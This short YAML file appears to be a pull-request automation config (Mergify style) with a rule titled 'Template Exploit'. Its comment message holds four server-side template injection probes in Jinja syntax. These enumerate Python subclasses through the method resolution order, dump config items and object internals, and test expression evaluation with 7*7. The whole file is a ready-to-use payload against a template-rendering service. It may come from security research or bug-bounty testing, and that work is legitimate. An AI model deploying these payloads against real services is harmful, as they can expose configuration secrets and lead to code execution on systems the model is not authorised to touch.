pull_request_rules:
  - name: "Template Exploit"
    conditions:
      - base=main
    actions:
      comment:
        message: |
          Test 1: {{ ''.__class__.__mro__[1].__subclasses__() }}
          Test 2: {{ config.items() }}
          Test 3: {{ self.__dict__ }}
          Test 4: {{ 7 * 7 }}
